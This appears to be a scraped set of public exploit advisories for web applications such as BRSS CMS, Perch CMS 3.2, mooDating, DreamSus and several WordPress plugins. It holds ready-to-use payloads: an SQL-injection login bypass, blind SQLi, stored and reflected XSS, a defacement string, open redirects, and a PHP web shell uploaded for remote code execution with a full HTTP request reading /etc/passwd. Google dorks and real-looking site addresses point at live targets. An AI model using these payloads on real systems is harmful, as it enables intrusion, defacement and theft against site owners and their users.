<pre><code>====================================================================================================================================<br />| # Title : BRSS CMS 2.1 Auth BY Pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | <br />| # Vendor : http://202.29.211.9/brss/index.php | <br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : user & pass : ADMIN' OR 1=1#<br /><br />[+] http://202.29.211.9/brss/index.php<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Wordpress Events Manager plugin 5.61 Blind SQL Injection |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) |<br />| # Vendor : https://wordpress.com/plugins |<br />| # Dork : "Login - ProLogin" |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : /?event_id=1<br /><br />[+] http://127.0.0.1/wp/?event_id=1 inject her<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>Exploit Title: Perch v3.2 - Stored XSS<br />Application: Perch Cms<br />Version: v3.2<br />Bugs: XSS<br />Technology: PHP<br />Vendor URL: https://grabaperch.com/<br />Software Link: https://grabaperch.com/download<br />Date of found: 21.07.2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux <br /><br /><br />2. Technical Details & POC<br />========================================<br />steps: <br />1. login to account<br />2. go to http://localhost/perch_v3.2/perch/core/settings/<br />3. upload svg file<br /><br />"""<br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><br /> <script type="text/javascript"><br /> alert(document.location);<br /> </script><br /></svg><br />"""<br />4. go to svg file (http://localhost/perch_v3.2/perch/resources/malas.svg)<br /><br /></code></pre>
<pre><code>Exploit Title: Perch v3.2 - Remote Code Execution (RCE)<br />Application: Perch Cms<br />Version: v3.2<br />Bugs: RCE<br />Technology: PHP<br />Vendor URL: https://grabaperch.com/<br />Software Link: https://grabaperch.com/download<br />Date of found: 21.07.2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux <br /><br /><br />2. Technical Details & POC<br />========================================<br />steps: <br />1. login to account as admin<br />2. go to visit assets (http://localhost/perch_v3.2/perch/core/apps/assets/)<br />3. add assets (http://localhost/perch_v3.2/perch/core/apps/assets/edit/)<br />4. upload poc.phar file<br /><br />poc.phar file contents :<br /><?php $a=$_GET['code']; echo system($a);?><br /><br />5. visit http://localhost/perch_v3.2/perch/resources/admin/poc.phar?code=cat%20/etc/passwd<br /><br /><br />poc request: <br /><br />POST /perch_v3.2/perch/core/apps/assets/edit/ HTTP/1.1<br />Host: localhost<br />Content-Length: 1071<br />Cache-Control: max-age=0<br />sec-ch-ua: <br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: ""<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYGoerZn09hHSjd4Z<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/perch_v3.2/perch/core/apps/assets/edit/<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: phpwcmsBELang=en; cmsa=1; PHPSESSID=689rdj63voor49dcfm9rdpolc9<br />Connection: close<br /><br />------WebKitFormBoundaryYGoerZn09hHSjd4Z<br />Content-Disposition: form-data; name="resourceTitle"<br /><br />test<br />------WebKitFormBoundaryYGoerZn09hHSjd4Z<br />Content-Disposition: form-data; name="image"; filename="poc.phar"<br />Content-Type: application/octet-stream<br /><br /><?php $a=$_GET['code']; echo system($a);?><br /><br />------WebKitFormBoundaryYGoerZn09hHSjd4Z<br />Content-Disposition: form-data; name="image_field"<br /><br />1<br />------WebKitFormBoundaryYGoerZn09hHSjd4Z<br />Content-Disposition: form-data; name="image_assetID"<br /><br /><br />------WebKitFormBoundaryYGoerZn09hHSjd4Z<br />Content-Disposition: form-data; name="resourceBucket"<br /><br />admin<br />------WebKitFormBoundaryYGoerZn09hHSjd4Z<br />Content-Disposition: form-data; name="tags"<br /><br />test<br />------WebKitFormBoundaryYGoerZn09hHSjd4Z<br />Content-Disposition: form-data; name="btnsubmit"<br /><br />Submit<br />------WebKitFormBoundaryYGoerZn09hHSjd4Z<br />Content-Disposition: form-data; name="formaction"<br /><br />edit<br />------WebKitFormBoundaryYGoerZn09hHSjd4Z<br />Content-Disposition: form-data; name="token"<br /><br />5494af3e8dbe5ac399ca7f12219cfe82<br />------WebKitFormBoundaryYGoerZn09hHSjd4Z--<br /><br /></code></pre>
<pre><code># Exploit Title: mooDating 1.2 - Reflected XSS<br /># Exploit Author: CraCkEr aka (skalvin)<br /># Date: 22/07/2023<br /># Vendor: mooSocial<br /># Vendor Homepage: https://moodatingscript.com/<br /># Software Link: https://demo.moodatingscript.com/home<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site<br /># CVE: CVE-2023-3849 - CVE-2023-3848 - CVE-2023-3847 - CVE-2023-3846<br /> CVE-2023-3843 - CVE-2023-3845 - CVE-2023-3844<br /><br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka <br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br />## Description<br /><br />The attacker can send to victim a link containing a malicious URL in an email or instant message<br />can perform a wide variety of actions, such as stealing the victim's session token or login credentials<br /><br /><br /><br />Path: /matchmakings/question<br /><br />URL parameter is vulnerable to RXSS<br /><br />https://website/matchmakings/questiontmili%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ew71ch?number=<br />https://website/matchmakings/question[XSS]?number=<br /><br /><br />Path: /friends<br /><br />URL parameter is vulnerable to RXSS<br /><br />https://website/friendsslty3%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3er5c3m/ajax_invite?mode=model<br />https://website/friends[XSS]/ajax_invite?mode=model<br /><br /><br />Path: /friends/ajax_invite<br /><br />URL parameter is vulnerable to RXSS<br /><br />https://website/friends/ajax_invitej7hrg%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ef26v4?mode=model<br />https://website/friends/ajax_invite[XSS]?mode=model<br /><br />Path: /pages<br /><br />URL parameter is vulnerable to RXSS<br /><br />https://website/pagesi3efi%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ebdk84/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l<br />https://website/pages[XSS]/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l<br /><br />Path: /users<br /><br />URL parameter is vulnerable to RXSS<br /><br />https://website/userszzjpp%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3eaycfc/view/108?tab=activity<br />https://website/user[XSS]/view/108?tab=activity<br /><br />Path: /users/view<br /><br />URL parameter is vulnerable to RXSS<br /><br />https://website/users/viewi1omd%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3el43yn/108?tab=activity<br />https://website/users/view[XSS]/108?tab=activity<br /><br /><br />Path: /find-a-match<br /><br />URL parameter is vulnerable to RXSS<br /><br />https://website/find-a-matchpksyk%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3es9a64?session_popularity=&interest=0&show_search_form=1&gender=2&from_age=18&to_age=45&country_id=1&state_id=5&city_id=&advanced=0<br />https://website/find-a-match[XSS]?session_popularity=&interest=0&show_search_form=1&gender=2&from_age=18&to_age=45&country_id=1&state_id=5&city_id=&advanced=0<br /><br /><br />[XSS Payload]: pksyk"><img src=a onerror=alert(1)>s9a6<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : CMSctweb creative v 1.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit) | <br />| # Vendor : http://www.contedia.com/ | <br />| # Dork : "ct web design by brown bear creative" inurl:.php?id= |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : /department.php?id=39'<script>alert(/indoushka/);</script><br /><br />[+] http://www.canterburyct.org/department.php?id=39%27%3Cscript%3Ealert(/indoushka/);%3C/script%3E<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : CMS Ultimate Solutions DreamSus v1.4 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : http://dreamsus.com | <br />| # Dork : intext:''Designed and Developed by Dreams Ultimate Solutions'' site:edu.in |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] use payload : /gallery1.php?adjacents=3div_disp=false&gallery_type=Extra%2520Curriculum'"()%26%25<acx><marquee><font color=lime size=32>Hacked by indoushka</font></marquee>&tpages=4<br /><br />[+] http://127.0.0.1/spcollegejejurieduin/gallery1.php?adjacents=3div_disp=false&gallery_type=Extra%2520Curriculum%27%22()%26%25%3Cacx%3E%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E&tpages=4<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : WordPress Page Builder KingComposer 2.9.6 Open Redirect Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | <br />| # Vendor : https://kingcomposer.com/ | <br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : /wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://packetstormsecurity.com/<br /><br />[+] https://example.com/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://packetstormsecurity.com/<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : WordPress Image Optimization 3.8.2 Open Redirect Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | <br />| # Vendor : https://wordpress.org/plugins/optimole-wp/ | <br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : /w:auto/h:auto/q:90/https://packetstatic.com/uimg1675889793/156867/150.jpg<br /><br />[+] https://mlsxkssu4flj.i.optimolecom/nyJIGCw._y-W~3254a/w:auto/h:auto/q:90/https://packetstatic.com/uimg1675889793/156867/150.jpg<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : CMS Ultimate Solutions DreamSus v1.4 unrestricted file upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : http://dreamsus.com | <br />| # Dork : intext:''Designed and Developed by Dreams Ultimate Solutions'' site:edu.in |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] http://127.0.0.1/spcollegejejurieduin/add_testimonial.php <==== Fill in the blanks and choose your malicious file and upload<br /><br />[+] http://127.0.0.1/spcollegejejurieduin/uploads/testimonial/Ev!l.php<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>